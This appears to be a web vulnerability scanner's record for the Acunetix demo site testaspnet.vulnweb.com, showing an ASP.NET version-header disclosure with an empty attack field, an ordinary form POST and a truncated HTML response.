value="/wEWVwKblqunCgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBEMuJR47/37fBoWsDm+8pRHDKDZX" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0
Method	POST
Parameter
Attack
Evidence	2.0.50727
Show / hide Request and Response
Request Header - size: 463 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 Content-Length: 6529 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 6,529 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA%2BPHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc%2BICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8%2BbmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A%2BICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A%2BICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA%2BLSBTdXBwb3J0IGZvciBJUHY2PGJyIC8%2BICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8%2BICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8%2BICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA%2BVGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E%2BLjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc%2BQWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BRm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ%3D%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLWjL6iDQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBAoC8%2BYwLqXVDFYA1YYr1Hu6oI9o
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 22936
Response Body - size: 22,936 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb